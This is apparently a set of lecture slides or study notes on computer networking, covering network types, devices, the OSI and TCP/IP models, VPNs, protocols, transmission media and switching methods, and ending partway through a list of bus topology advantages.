Networks

• Networks mainly important for communication, sharing

information
• Early networks limited to exchanging character based
information between interconnected computers
• Modern networks carry voice, music, video, text, graphics
between different devices
• Instant messaging, blogs, podcasting, wikis, online gaming
etc depend on networks
• Computer network - A computer system which uses
communications equipment to connect computers and their
resources;
 Terms and Definitions
• Bus topology – Computer network in which a bus connects all the devices
together through a common cable
• Cable – Copper wire (usually coaxial / twisted pair) and fibre optic cable
(made from glass) used for connecting devices
• Check digit – Extra digit added to numerical data that is used to check
data integrity after input, transmission, storage and processing
• Data integrity – The accuracy of data after input, transmission, storage or
processing
• Check sum – Error detecting procedure that generates a sum from the
digits of a number
• Data packet – Portion of a message that is transmitted through a
network / Fundamental unit of transmission. Has a fixed format. Contains
check digits, destination address etc
• Gateway – Link that resides between computer networks and is
responsible for converting data passing through into the appropriate
format so it can be understood by the receiving network.
 Terms and Definitions
• Handshaking – Exchange of predetermined signals to signify that a
connection has been established between two systems
• Hub – Network connection point for devices. Data arriving at a hub
is copied and sent to all the devices on the network
• ISDN (Integrated services digital network) – International
communications standard that allows for the transmission of
audio/video and other data over digital telephone lines
• LAN – Computer network where all the connected computers are
within a limited geographical area. Connection between the
computers may be through cables / microwave
• Microwave transmission – Line of sight transmission with towers
containing antenna
• Modem – Electronic equipment that converts computer digital
signals into analog and vice versa. The analog signals are transmitted
over telephone lines, which allows for distant communication.
 Terms and Definitions
• Network – Computer systems that are interconnected to share resources
and data
• Packet – Group of bits. May include control signals, error control bits,
coded information as well as destination
• Packet switching – Network communication method that creates and
transmits small units of data called packets through a network
independently of the overall message
• Parity bit – Error detecting procedure that appends a binary digit to a
group of bits to establish the accuracy of data after input, transmission,
storage or processing
• Protocol – International rules that ensure the transfer of data between
systems. A protocol that is recognized as the standard for a specific type
of transfer is called standard protocol. Eg. TCP/IP (transmission control
protocol / internet protocol used to connect hosts on the internet)
• WAN – Computer network where all the connected computers are in a
larger geographical area
 Network Devices
• Server
– It can be a computer system or a software application that provides
a service to the other systems connected to the same network
– Host running server software applications and sharing its resources
with clients
– Server waits for requests from clients
– File Server, Database server
• Client
– It can be a computer system or a software application that requests
a service from the server connected to the same network
– It does not share any of its resources but requests content from the
server.
– Email client
 Network Devices
• Hub
– Connection point for devices on a single network
– Systems connect to hub using ethernet cable via a port
– Hub contains multiple ports
– When a network device wishes to send data to some other
device on the network, it sends the data to the hub
– The hub copies the data and sends it to all devices connected to
its ports
– The device waiting to receive the data accepts the data (all
other devices ignore the data)
– A lot of traffic is generated on the network, since all the other
ports that just ignore the data have to receive it
– This slows down the network
 Network Devices
• Switch
– A switch is also the connection point for multiple
devices on a single network
– However, a switch can recognize which device is
connected to which port
– This allows the switch to transmit data to the exact
port and network device for which it is intended
– Networks connected with switch are faster than
networks connected with hubs
 Network Devices
• Router
– More sophisticated than hub and switch
– Its use is to join multiple networks and serve as an intermediary between
these networks so that the data can be exchanged effectively and
efficiently
– Example - Router is used to connect home computer to internet
– Hub/Switch/Router are integrated into a single box
Note - A LAN provides the nodes connected to it with direct (Layer 2) access
to one another. It is usually comprised of one or more Ethernet switches.
Computers on different LANs talk to each other using Layer 3 (IP), via a
router. 
The most important difference between them is that a switch bases its
forwarding decision on a layer 2 address (in ethernet is called MAC address)
whereas a router on the layer 3 address (the IP address). So basically
switches care about MAC addresses and routers about IP addresses
 Characteristics of Internet
• Collection of countless types of computers
and networks connected together
• WWW, email, file transferring are services that
are built on internet
• No centralized control but governments have
the power to restrict what citizens in their
countries can access.
• ISPs can also restrict access to specific sites
 Different types of networks
• Local Area Network (LAN) : A small group of computers
connected, usually over a very small area - a single room,
small offices or a building. Usually connected with copper
cables, Ethernet.
• Usually have high data transfer rates
• Client - Server mode of operation is used
• LANs allow sharing of peripheral devices (printers,
scanners, external hard drives) – eliminates the need to
buy peripheral devices for every computer
• Another benefit is Data sharing. Exchange of data between
clients increases flexibility and reduces wastage of time
• Hub / Switch with Ethernet cabling
 Different types of networks
• Wireless LAN (WLAN): provides connectivity
to wireless devices within a limited geographic
area.
• Same as a LAN, just with radio wave
connections (WiFi) instead of wires.
• Mobiles, laptops can be connected
• In general slower than a LAN.
• WLANs can be less secure than wired LANs (if
the wireless network signal is strong enough,
can be accessed outside the premises)
 Different types of networks
• Virtual Local Area Network (VLAN) :
• A group of network devices that are on the same LAN
but are partitioned.
• A VLAN might comprise a subset of the ports on a
single switch or subsets of ports on multiple switches.
• By default, systems on one VLAN don't see the traffic
associated with systems on other VLANs on the same
network.
• VLANs allow network administrators to partition their
networks to match the functional and security
requirements of their systems
 Different types of networks
• Metropolitan Area Network (MAN): Network
over a larger area, usually city-size, connecting
computers and LANs. Sometimes done with
fiber optics as high speeds are required.
• Wide Area Network (WAN): Network over large
geographical areas, often across and beyond
continents. Most known WAN is the internet.
Various transmission media, like phone cables,
fiber optics and satellite transmission, are used.
Connects many computers, LANs or WANs.
 Different types of networks
• Storage Area Network (SAN) – is a high-speed
network of storage devices that also connects
these devices with servers.
• Examples of storage devices – disk arrays, tape
libraries
 Different types of networks
• Personal Area Network (PAN) – A short-range network
of personal devices, such as cell phones, tablets and
audio headsets, often utilizing Bluetooth or short-range
radio.
• Interconnects devices that are centred around an
individual person’s workspace.
• LAN that supports only one person
• Very short range, max of 10 m
• Mobile, laptop, tablet interconnected and sharing data
such as emails, calendars, photos
• Wired (through USB) or wireless (through bluetooth)
piconet
 Different types of networks

• Internet
• the ultimate wide area network spanning the entire globe; a vast collection
of smaller networks.
• Services – www, email, file transfer
• Not owned by any entity, not centrally administered
• Decentralized design – resources are spread out, no single server
• Access to Internet provided by ISP (Internet Service Provider)
• Intranets
• An intranet is a set of networks that are under the control of a single
administrative entity.
• The intranet uses the IP protocol and IP-based tools such as web browsers
and file transfer applications.
• The administrative entity limits use of the intranet to its authorized users.
• Most commonly, an intranet is the internal LAN of an organization.
• Purpose - Communication and data sharing
• In case an intranet is connected to internet, a firewall is used for protection
 Different types of networks

• Extranet
• An extranet is a network that is also under the administrative
control of a single organization, but supports a limited connection
to a specific external network.
• For example, an organization may provide access to some aspects
of its intranet to share data with its business partners or
customers.
• These other entities are not necessarily trusted from a security
standpoint.
• A firewall controls the access rights and allows access to the
intranet only to the people who are authorized
• Features
• An external extension to a company’s local network;
• Limited access;
• Uses internet protocols;
 Different types of networks

• Virtual Private Network

– Computer network that connects two or more computer
systems but also allows clients from remote locations to
connect to the network and appear to be inside the LAN
– VPN allows creation of a LAN to which clients can
connect from a remote location even through a different
network
– VPN has all the benefits of a LAN allowing users to share
data and resources without compromising security
– VPN can securely and cost effectively connect
geographically disparate offices of a business within a
network with all functionalities of LAN
• Example 1: A business can let employees work at
home / employees who travel a lot/external
(non-employee) users; Accessing the data and
services (at the office); Via secure login;
• Example 2: Using VPN, address is masked; The
location of the user is not known; May be
essential in delicate situations such as political
protest groups working from their own country;
 Different types of networks

• Peer to Peer (P2P)

• A peer-to-peer (P2P) network is created when two or more PCs are
connected and share resources without going through a separate
server computer.
• A P2P network can be an ad hoc connection—a couple of computers
connected via a Universal Serial Bus to transfer files.
• A P2P network also can be a permanent infrastructure that links a
half-dozen computers in a small office over copper wires
• Distributed network architecture, decentralized where nodes are both
clients and servers at the same time
• Features
– No central server;
– Resources are more widely available (storage, bandwidth, computing power);
– Redundancy/recovery;
– Supports file sharing for collaborative work;
 Different types of networks

• Internet of Things
• Network of Individual things that are able to connect
to the Internet, communicate and exchange data
• All things carry the necessary hardware and
software and have an IP address
• Some ways to connect to internet
– Broadband access via DSL or cable modem
– WiFi access
– Dial up access via modem
– Mobile networks (3G, 4G)
• Globalization has been accelerated by the technical
advances linked to network development.
 Importance of standards in the construction
of networks
• Standards enable compatibility through a common “language”
internationally.
• Allows the interoperability / compatibility among different computer
hardware and software.
• Allows a set of rules in order for the networks to function properly
throughout the world due to the fact some countries might not have access
to advanced technology and will still have to access the world wide network. 
a) International Standards Organization (ISO)
b) International Telecommunications Union (ITU)
c) American National Standards Institute (ANSI)
d) Institute of Electrical and Electronics Engineers (IEEE)
e) Electronic Industries Association (EIA)
f) Internet Engineering Task Force (IETF)
 Networks, Communication and Layers
• Different computer systems manufacturers
• Hardware differs, Software differs, still systems need to
communicate
• Standards came into place
• Communication was through different layers (each layer uses
different protocols)
• Software application in one system creates some data to be sent to
another software application in another system
• Data format to be understandable by both applications
• Data is encoded before passed on to the network
• Data is broken up into packets with destination address
• Packets travel through the network (Routing protocols)
• Only 1s, 0s travel over media
• Finally receiving application reassembles the data
 Networks, Communication and Layers
• Advantages of Layers
– Easy to manage
– Greater understanding of each layer
– Common language for each layer
– Makes protocol design easier
– A manufacturer can focus on technologies of a particular layer
– Products of different manufacturers can work together
– When changes are made to one layer, the impact on the
other layers is minimized.
– Enables troubleshooting efforts to be pinpointed on the layer
that carries out the suspected cause of the problem
– Technology advances of a layer are independent of
technology advancements of other layers
 Communication over networks is broken
down into different layers (OSI model)
• The computer communications networks we use today are based on the OSI reference model.
• Established by ISO (International Standards Organization)
• Aim of the OSI model is to allow communications across many different technical platforms
and to allow easy development.
• To reach this, the model defines seven consecutive layers with individual roles.
• The OSI is a standardized system/model for network connection; Consists of (7) layers; Each
dealing with specific parts of network communication; For example the physical layer which
defines the physical connection;
 OSI
• Layer 7 - Application layer:
• This layer provides functions for the applications
running on a computer. Data input and output
happens over this layer.
• Examples of common functions include:
– Protocols for providing remote file services, such as open,
close, read, write, and shared access to files
– File transfer services and remote database access
– Message handling services for electronic mail applications
– Global directory services to locate resources on a network
– A uniform way of handling a variety of system monitors and
devices
– Remote job execution
 OSI
• Layer 6 - Presentation layer:
• This layer is the system specific presentations of the data (i. e. ASCII).
• It enables the correct exchange of data between different systems.
• Also, data compression and encryption belong to this layer.
• In general, it ensures that data sent by the application layer can be read by the
presentation layer of the receiving system.
• If necessary, it works as a translation layer between the different data formats used by
the two systems.
• Layer 5 - Session layer:
• This layer sets up, coordinates and terminates conversations. Services include
authentication and reconnection after an interruption.
• The term session refers to a connection for data exchange between two parties
• If a communication session is broken, the session layer determines where to restart the
transmission once the session has been reconnected
• This layer is also responsible for determining the terms of the communication session
• Layer 4 - Transport layer:
• Functions of this layer include segmenting the data stream into packets, reassembling
with sequence numbers, acknowledgements, error detection and correction, flow
control (TCP , UDP)
 OSI
• Layer 3 - Network Layer:
• In packet oriented networks, this layer is responsible for the forwarding of
data packets.
• Data forwarding happens over the entire network and includes the routing
of packets between the network nodes.
• The Network layer of the OSI model is responsible for managing logical
addressing information in the packets and the delivery of those packets to
the correct destination.
• Routers, which are special computers used to build the network, direct the
data packet generated by Network Layer using information stored in a table
known as routing table.
• The routing table is a list of available destinations that are stored in memory
on the routers.
• The logical address is used by network layer protocols to deliver the packets
to the correct network.
• The Logical addressing system used in Network Layer is known as IP address.
• IP addresses are also known as Logical addresses or Layer 3 addresses.
 OSI
• Layer 2 - Data Link layer:
• Task of this layer is to ensure a faultless transmission of data and to regulate access to
the transmission medium, by breaking up the bit stream in frames and providing
those with checksums to be able to detect a corrupted data packet.
• The Data Link Layer is logically divided into two sublayers, The Media Access Control
(MAC) Sublayer and the Logical Link Control (LLC) Sublayer.
• Media Access Control (MAC) Sublayer determines the physical addressing of the
hosts.
• Logical Link Control (LLC) Sublayer helps to communicate with the upper-level layers.
• The MAC sub-layer maintains MAC addresses (physical device addresses) for
communicating with other devices on the network.
• MAC addresses are burned into the network cards and constitute the low-level
address used to determine the source and destination of network traffic.
• MAC Addresses are also known as Physical addresses, Layer 2 addresses, or Hardware
addresses.
• The Logical Link Control sublayer is responsible for synchronizing frames (indicating
the beginning and end of data, error checking, and flow control (transmission rate
according to the receiver buffer).
 MAC address format

The first six hexadecimal digits,

The remaining six hexadecimal
which are administered by the
digits comprise the interface serial
IEEE, identify the manufacturer or
number.
vendor.
 OSI
• Layer 1 - Physical layer:
• This is the lowest layer.
• The Physical Layer is limited to the processes needed to place the communication signals over the
media, and to receive signals coming from that media.
• The lower boundary of the physical layer of the Open Systems Interconnection (OSI) model is the
physical connector attached to the transmission media.
• Physical layer of the Open Systems Interconnection (OSI) model does not include the transmission
media.
• The Physical Layer defines:
– Physical network structures
– Mechanical and electrical specifications for using the transmission medium
– Bit transmission encoding and timing rules
• The physical layer does not include a description of the medium and does not provide any sort of
error correction.
• However, implementations of physical protocols are transmission-media-specific
• The following network connectivity hardware are normally associated with the OSI physical layer:
– Network interface boards (NIC, adaptors, and so on)
– Hubs, and repeaters that regenerate electrical signals
– Transmission media connectors, which provide the mechanical interface to interconnect devices to the
transmission media (cables, BNC connectors, etc)
– Modems and codec's, which perform digital analogue conversions.
 TCP/IP model
• Hierarchical model – that models and
represents all the functionality required for
successful communication between the users
• 4 Layers
SIMILARITIES
  

• They share similar architecture. -    Both of the models share a

similar architecture.  This can be illustrated by the fact that both
of them are constructed with layers.
• They share a common application layer.- Both of the models
share a common "application layer".  However in practice this
layer includes different services depending upon each model.
• Both models have comparable transport and network layers.-
This can be illustrated by the fact that whatever functions are
performed between the presentation and network layer of the
OSI model similar functions are performed at the Transport layer
of the TCP/IP model.
• Both models assume that packets are switched.- Basically
this means that individual packets may take differing
paths in order to reach the same destination.
DIFFERENCES
 
• TCP/IP Protocols are considered to be standards around which
the internet has developed.  The OSI model however is a
"generic, protocol- independent standard."
• TCP/IP combines the presentation and session layer issues into
its application layer.
• TCP/IP combines the OSI data link and physical layers into the
network access layer.
• TCP/IP appears to be a more simpler model and this is mainly
due to the fact that it has fewer layers.
• TCP/IP is considered to be a more credible model- This is mainly
due to the fact because TCP/IP protocols are the standards
around which the internet was developed therefore it mainly
gains creditability due to this reason.  Where as in contrast
networks are not usually built around the OSI model as it is
merely used as a guidance tool.
• The OSI model consists of 7 architectural layers whereas the
TCP/IP only has 4 layers.
Technologies required to provide a VPN
• VPN is Virtual Private Network that handles and transfers data as if it were
private but by using public networks.
• A VPN makes a tunnelled network connection through the internet or any
other public network. The technology used is IPSec with encryption or TLS/SSL
3.0 with encryption
• Tunneling is the process of placing an entire packet within another packet
before it's transported over the Internet. That outer packet protects the
contents from public view and ensures that the packet moves within a virtual
tunnel.
• To set up a VPN, you need:
– Client VPN software to make a secure remote connection
– VPN-aware routers and firewalls to permit legitimate VPN traffic to pass unhindered
– VPN appliance/concentrator/server to handle and manage incoming VPN traffic,
establish and manage VPN sessions and their access to network resources
– Internet access
 VPN
• VPN allows the administrators to take advantage of the Internet in order to help
provide private WAN connections functionality and security at a low cost.
• The VPN is also part of a comprehensive network access solution which includes
support for authorization and authentication services, as well as advanced network
security technologies.
• VPN connections use Point-to-Point Tunneling Protocol (PPTP) or Layer Two
Tunneling Protocol/Internet Protocol security (L2TP/IPSec) on an intermediate
network i.e. Internet.
• VPN saves the cost of long-distance phone services and hardware costs associated
with dial-up or leased line connections by using the Internet as a connection
medium.
• Virtual private networks are point-to-point connections that are put across private or
public networks such as the Internet.
• VPN clients use special TCP/IP-based protocols (tunnelling protocols) to make a
virtual call to a virtual port on a VPN server.
• In a typical VPN deployment, a client initiates a virtual point-to-point connection to a
remote access server over the Internet.
• The remote access server answers the call, authenticates the caller, and transfers
data between the VPN client and the organization’s private network.
• It is possible for workers to connect to a company's internal
network from almost anywhere on the world.
• This gave rise to home offices, as many office jobs do not require
consultation and hence can be completed from home.
• For example, a mother working half time as an accountant can
bring her children to school in the morning, can then download
necessary papers form the company's network through a VPN
and complete her work, and by the time she finishes, she can pick
her kids up from school.
• This has saved a significant amount of time in her daily schedule
that would otherwise have been spent on travelling to and from
work.
• Benefits
• Savings in fuel cost and commuting time; An opportunity to work at your
own pace / more comfortable; Increased productivity; An opportunity to
work in an undisturbed environment; Choose their own work hours;
Convenience of not having to travel;

• Problems
• Employers can claim the employees as part time consultants or the like to
avoid paying benefits like insurance, medical plans, taxes; The strain on
families that result when a family member works at home; At-home
employees miss interaction with co-workers at the office; At-home
employees think they work too much, employers think they do not work
enough; Employees cannot monitor employees; Expense of setting up a
VPN;
VPN Encapsulation of Packets
VPN- BASIC ARCHITECTURE
 Working of a VPN
 Two connections – one is made to the Internet
and the second is made to the VPN.
 Datagrams – contains data, destination and
source information.
 Firewalls – VPNs allow authorized users to
pass through the firewalls.
 Protocols – protocols create the VPN tunnels.
 Four Critical Functions
Authentication – validates that the data was sent
from the sender.
Access control – limiting unauthorized users from
accessing the network.
Confidentiality – preventing the data to be read
or copied as the data is being transported.
Data Integrity – ensuring that the data has not
been altered
 Secure VPN
• All traffic on the VPN must be encrypted, authenticated
and then sent along virtual tunnels
• Secure VPN technologies
– Internet Protocol Security protocol (IPSec) which functions in
both transport and tunnel mode
• Allows the secure transmission of data over public IP-based networks
• Uses standard encryption algorithm to provide confidentiality (AES –
Advanced Encryption Standard)
• Provides authentication via digital certificates
– Secure Sockets Layer (SSL) 3.0 or Transport Layer Security (TLS)
with encryption
• These are much simpler than IPSec based VPNs
• The use of this technology does not require special client software
because all web servers and web browsers support this method of
providing a VPN
 Trusted VPN
• Over the years, implementations of trusted VPNs have moved from
raw private circuits leased from telecommunications vendors to
private IP network circuits leased from Internet providers.
• All traffic on the VPN relies on the security of a provider’s network.
• Layer 2 VPNs implemented using
– Asynchronous transfer mode (ATM) circuits
– Frame relay circuits
– Transport of layer 2 frames over Multiprotocol Label Switching (MPLS)
– All these transmit packets via a fixed path ( just like circuit switching. Differences
exist in size of data, controlling mechanisms)
• Layer 3 VPNs
– MPLS with constrained distribution of routing information through Border
Gateway Protocol (BGP)
– Multiprotocol Label Switching (MPLS) is a type of data-carrying service for high-
performance telecommunications networks that directs data from one network
node to the next based on short path labels rather than long network
addresses, avoiding complex lookups in a routing table.
 Hybrid VPN
• A combination of both secure and trusted
technologies or a combination of two VPN
technologies
 Common VPN types
• Site to site VPN
– This type connects entire networks and facilitates secure data interchange
between different sites.
– a site-to-site VPN should eliminate the need for each computer to run VPN
client software as if it were on a remote-access VPN.
– Dedicated VPN client equipment can accomplish this goal in a site-to-site
VPN.
– VPN gateways are used (VPN gateway is a physical router device that
connects two or more devices or networks together in a VPN infrastructure)
 Common VPN types
• Remote Access VPN
– This type connects individual hosts to private
networks and facilitates teleworkers who need to
access their company’s network securely using the
internet.
– Every host has VPN client software installed
• Remote Access VPNs provide remote connectivity to telecommuters and mobile
users. They’re typically an alternative to dedicated dial or ISDN connections. They
offer users a range of connectivity options as well as a much lower cost solution.

Intranet VPNs link corporate headquarters, remote offices, and branch offices over a
shared infrastructure using dedicated connections. The VPN typically is an alternative
to a leased line. It provides the benefit of extended connectivity and lower cost.

Extranet VPNs link customers, suppliers, partners, or communities of interest to a

corporate intranet over a shared infrastructure using dedicated connections. In this
example, the VPN is often an alternative to fax, snail mail, or EDI. The extranet VPN
facilitates e-commerce.
 Summary
• Tunneling protocols;
– Allows the data to be encapsulated/hidden whilst
travelling across the internet;
• Encryption protocols (IPSEC);
– If hacked it will not be understandable;
• The use of gateways;
– Allows to connect with the company’s server;
 Safety in VPN
• Authentication; Nobody outside the VPN should be able
to affect the security property of the VPN (it must be
impossible for the attacker to weaken/change encryption);

• Encryption; Data intercepted will not be readable;

• Tunneling software; Security properties of each tunnel
should be agreed by the administrators of the two
endpoints of the tunnel;
• Multiple exit nodes; Makes it hard to distinguish where
the data was generated thus more secure (less prone to
phishing);
 VPN vs Extranet
• VPN authenticates the sender before
(establishing the tunnel);
• VPN access is always encrypted, whereas
extranet has limited encryption;
• VPN transmission is always encrypted;
• VPN users have access to everything whereas
extranet users only have access to (enabled)
specific services;
 VPN vs Intranet
• Intranet is a type of network while VPN is a method of connecting distant
computers
• A VPN goes through a public network while an Intranet does not have to
• With Intranets, the computers are usually located in the same vicinity so
there is little or no need to utilize the Internet and employ complicated
encryption systems.
• An Intranet is just a local network that utilizes the same technologies that
the Internet does (i.e. HTTP, SMTP, FTP) in order to simplify things and
make it a lot easier for members of the organization to access resources
and share data.
• On the other hand, VPN was created to address the need of inexpensive
and secure connections between distant offices. Prior to VPN, leased lines
provided a secure but very expensive means of achieving this.
 VPN advantages
• Communication is easier
• Companies take advantage of Internet to provide secure connections
• Decreases operational costs versus traditional WANs
• Employees work as if they were directly connected to the company’s network
• Extends connection across numerous geographic sites without the use of
leased line
• Improves overall productivity
• Offers the flexibility to employees to take advantage of the company’s
intranet over an existing internet connection
• Offers flexibility to remote offices
• Offers global networking opportunities
• Reduces environmental footprint
• Reduces travel times / travel costs for remote users
• Simplifies network topology for administrators and companies
 VPN Disadvantages
• VPNs require an in-depth understanding of public network
security issues and proper deployment of precautions.
• The availability and performance of an organization's wide-area
VPN (over the Internet in particular) depends on factors largely
outside of their control. (because of the dependency on public
network)
• VPN technologies from different vendors may not work well
together due to immature standards.
• VPNs need to accommodate protocols other than IP and
existing ("legacy") internal network technology.
• Security vulnerability if user PCs are used (Some companies
insist on company owned systems for VPN)
 protocol, data packet
• Protocol: a set of rules that communicating parties use when
using a communication network.
• A set of rules to coordinate data transmission (between a sender
and a receiver);
• Protocols are a set of rules; To facilitate a process being carried
out correctly; (Used in each layer to ensure communication;)
For example (in the physical layer) the protocols could define the
methods for opening and closing communication;
• Data packet: the compartmentalized pieces of information into
which a message is broken down in a packet switching network
system. Basic unit of transmission. Has a fixed format. Contains
addresses (source and destination), sequence number
 Protocol for general communication
• Presence of an identified sender
• Presence of an identified receiver
• Presence of an agreed upon method of communicating
• Presence of common language
• Presence of common grammar
• Presence of an agreed upon speed and timing of
delivery
• Presence of confirmation/acknowledgement
requirements
 Computer Network Protocols provide
• Rules about message format
• Rules about the way intermediary devices should
facilitate communication
• Rules about initiation and termination of a
communication session
• Rules about the type of error checking , error
detection and correction mechanisms to be used
• Rules about data compression methods
• Rules about recovery / resending of data
 Why protocols are necessary?
• Data integrity
– To verify the packets transmitted that the information received is exactly the same as the information sent. (accuracy
and consistency of data) E.g checksum
• Source integrity
– Identity of the sender has been validated. Digital signatures provide source integrity
• Flow control
– If the receiver is relatively slow at reading the data, the sender can very easily overflow the connection’s receive
buffer by sending too much data too quickly.
• Feedback based (Receiver notifying the sender to send more data)
• Rate based (algorithm to alter the rate)
• Deadlock detection and prevention
– a deadlock is a situation in which two or more competing actions are each waiting for the other to finish, and thus
neither ever does.
– Occurs because of lost signals
– Persistence timer is used to resolve the situation
• Congestion control
– Congestion control concerns controlling traffic entry into a network, so as to avoid over usage of any of the
processing or link capabilities of the intermediate nodes and networks, such as reducing the rate of sending packets.
– Congestion can lead to queuing delay, packet loss, blocking of new connections.
– It should not be confused with flow control, which prevents the sender from overwhelming the receiver.
• Error detection and correction
– This enables reliable delivery of data over unreliable channel (channel noise)
– Errors may be introduced during transmission
– Error checking allows detection and reconstruction of the original data
– Example Checksum included as part of the packet
• To ensure data integrity; To control data flow / allow data flow;
Provide error checking; Minimize congestion; Prevent deadlock;
Allows interoperability;
• Protocols generally define the syntax/structure of the data,
semantics/meaning of the bits
• It also defines the timing (how fast, when, how much)
• Direct / Indirect
– Point to point link
– Multipoint link (Protocol should define the access control here)
• Symmetric / Asymmetric
– Symmetric involve communication between peer entities.
– Asymmetry may be dictated by the logic of an exchange and (eg; client and a
server process) the desire to keep one of the entities or systems as simple as
possible.
– Protocols should address this
 Why the speed of data transmission across a
network can vary?
• Different media support different transfer speeds
• Main unit to measure data transfer is bps
• We use kbps and mbps
• Theoretical speed of data in a medium is bandwidth
• It depends on the physical property of the medium and signalling
technique used
• Actual transfer rate is called throughput
• Affected by interference, traffic, number of connected devices and
errors
• In a network with many segments, the slowest segment creates a
bottleneck that affects the throughput of the network
• Goodput measures the transfer rate of usable data
 Why the speed of data transmission across a
network can vary?
• Nodal Processing:
– Packet header examination
– Error checking
– Packets are sent to a queue. The delay depends on the number of items in the queue.
• Transmission delay:
– L/R=Time to send bits into link
– R= link bandwidth (bps)
– L= packet length (bits)
• Propagation delay:
– d/s
d = length of physical link
s = propagation speed in medium
• Many users may want to transmit data through the network at the same time
• Interference to the network from the outside can corrupt many data packages, causing them to have been
retransmitted
• Different parts of network use different media;
• Network congestion;
• Packets may take different routes;
• The receiver may be busy;
• Physical size of the network;
 Factors that affect the speed of data
transmission
• Bandwidth of the network
• Data transfer rate of storage devices
• Interferences
• Malicious software
• Number of connected devices
• Number of users and their demand at any particular time (traffic)
• Packet loss and retransmission
• Read speed of storage devices
• Slowest segment
• Speed, technology and capacity of the network server
• Time required for user authentication and various security checks
• Types of files sent
• Type of transmission medium
• User’s PC CPU speed
• User’s RAM / disk caching
• User’s PC various subsystem performance
 why compression of data is often necessary
when transmitting across a network?
• Data compression- reducing the amount of space needed to
store/transmit a piece of data
• Reduction of bits by encoding data using fewer bits than the original
representation
• The Web and its underlying networks have inherent bandwidth
restrictions which define the maximum number of bits or bytes that can
be transmitted from one place to another in a fixed amount of time.
• Earlier, data transmission often happened through the slow phone
network, so compressing data for faster transmission was essential.
• Today, the transmission speeds have greatly increased, but we are
transmitting far more data over the networks than earlier (movies, social
media, news), so compression is needed to be able to transmit the
enormous amounts of data without using up all the bandwidth.
– Faster transmission
 why compression of data is often necessary
when transmitting across a network?
• Lossy compression – some loss of information is
acceptable here. There is no way to get the original file
back. Eg JPEG, MPEG2
• Lossless compression – Reduces number of bits by first
identifying and then eliminating statistical redundancy
• GIF (Graphics Interchange Format) – Lossless
compression. Works for graphic file that has fewer
than 256 colours
• MP3 – audio coding format – lossy technique
• MPEG2 – lossy audio and video compression
 characteristics of different transmission
media
• Factors to be considered
– Speed
– Reliability
– Cost
– Security
 characteristics of different transmission
media
• Guided Media
• Fibre Optics
– An optical fibre is a thin, flexible medium which conducts quick pulses of light
– Fibre optics can transfer hundreds of gigabits per second and is not affected by electromagnetic interference
– Suitable for long distance with less repeaters
– Much higher bandwidth
– Smaller size and light weight
• Twisted Pair
– The twisted pair copper cables are the most inexpensive type of transmission media and has been used for
many years by phone companies.
– Two copper wires are twisted together and coated with a protective layer.
– Limited in terms of data rate and distance
– UTP – Unshielded Twisted Pair – used in LANs. Easy to install, prone to electrical interference. Low cost of
installation, good for short distances between repeaters, used in telephone networks
– STP – shielded twisted pair- more difficult to install than UTP, reduced interference
• Coaxial Cable
– Like twisted pair, coaxial cable consists of two copper wires, but instead of being parallel, they are concentric.
– With the construction and special type of shielding and insulation, the coaxial cable can carry a lot more bits
much faster than the twisted pair.
– Can support higher data rates compared to twisted pair
 characteristics of different transmission
media
• Unguided Media
• Radio Waves (omni directional) / Micro waves (Line of Sight)
– Price varying by size of network (WLAN is usually cheap)
– Used for mobile telephone network and LANs
– Average speed
– Average reliability
– Insecure communication
– Works well for rough terrains
– Weather conditions affect the performance
• Satellite – uses specific frequencies for uplink and downlink, use of transponders
• Infrared – very short distance, cannot pass through objects, LOS required, better
security
• RFID - Radio-frequency identification uses electromagnetic fields to automatically
identify and track tags attached to objects.
• Bluetooth – uses very low power, short distance
• Free Space Optics – Use of lasers, LOS or use of mirrors to reflect, affected by weather
 Data transmitted by packet switching
• Packet switching is a method of transmitting information over a computer
network.
• The information is broken down into smaller pieces, the packets , then transmitted
across the network.
• Every packet contains:
– The source of the packet
– The destination of the packet
– Length of the information part
– A running number of the packet
– Classification of the packet
• The packets are transported as individual and independent units through the
network, so they can travel on many different ways.
• At the receiver end, they are combined with their sequence numbers.
• Each packet also has a counter which is decremented as it passes through a
node. When it becomes zero, the packet is discarded.
• Each router in a WAN decides on the route to be taken by the packet depending
on the destination address and the shortest path.
• On an error or a collision, the sender is requested to resend the packet.
 Data transmitted by packet switching
• Advantages:
– Because single packets are small, waiting times are low and because
packets can travel through multiple channels independently, the
network will be utilized better.
– Resources will be given fairly to participants in the network.
– Because of small packet size transmitting errors can be detected fast.
– High resistance against fallouts. If part of the network falls out
packets can route around the broken down transmission lines.
• Disadvantages:
– Because transport routes are not fixed, overloading can occur at
transmitting stations.
– Packets don't arrive in order (they can take separate ways).
– All participants have to use the same network protocols.
– No constant bandwidth can be guaranteed and big fluctuations in
bandwidth can happen.
 Circuit Switching
• In modern circuit-switched networks, electronic signals pass through several
switches before a connection is established.
• During a call no other network traffic can use those switches.
• The resources remain dedicated to the circuit during the entire data transfer
and the entire message follows the same path.
• Circuit switching can be analog or digital.
Advantages
• Circuit is dedicated to the call – no interference, no sharing
• Guaranteed the full bandwidth for the duration of the call
• Guaranteed quality of service
Disadvantages
• Inefficient – the equipment may be unused for the period of the call; if no data is being
sent, the dedicated line still remains open.
• It takes a relatively long time to set up the circuit.
• During a crisis or disaster, the network may become unstable or unavailable.
• It was primarily developed for voice traffic rather than data traffic.
Virtual circuit switching is a packet switching technology that emulates circuit switching, in
the sense that the connection is established before any packets are transferred, and packets
are delivered in order.
 Message Switching
• No need for a dedicated path to be established between two
nodes.
• When a station sends a message, it appends a destination address
to the message.
• The message is then transmitted through the network, in its
entirety, from node to node.
• Each node receives the entire message, stores it briefly and then
transmits it to next node.
• A delay is introduced due to time required to find the next node in
the transmission path and then send the message.
• Network using message switching is also called “Store-and-
Forward” network.
 Network Topologies
• Computer network topology is the way various
components of a network (like nodes, links,
peripherals, etc) are arranged.
• Network topologies define the layout, virtual
shape or structure of network.
• The way in which different systems and nodes
are connected and communicate with each
other is determined by topology of the
network.
 Bus Topology
• Simplest
• all the nodes (computers as well as servers) are connected to the single cable
(called bus), by the help of interface connectors.
• This central cable is the backbone of the network and is known as Bus.
• Every workstation communicates with the other device through this Bus.
• A signal from the source is broadcasted and it travels to all workstations
connected to bus cable.
• Although the message is broadcasted but only the intended recipient, whose
MAC address or IP address matches, accepts it.
• If the MAC /IP address of machine doesn’t match with the intended address,
machine discards the signal.
• A terminator is added at ends of the central cable, to prevent bouncing of
signals.
• A barrel connector can be used to extend it.
 Bus Topology
• Advantages (benefits) of Linear Bus Topology

1)  It is easy to set-up and extend bus network.

2)  Cable length required for this topology is the least compared to others.
3)  Bus topology costs very less.
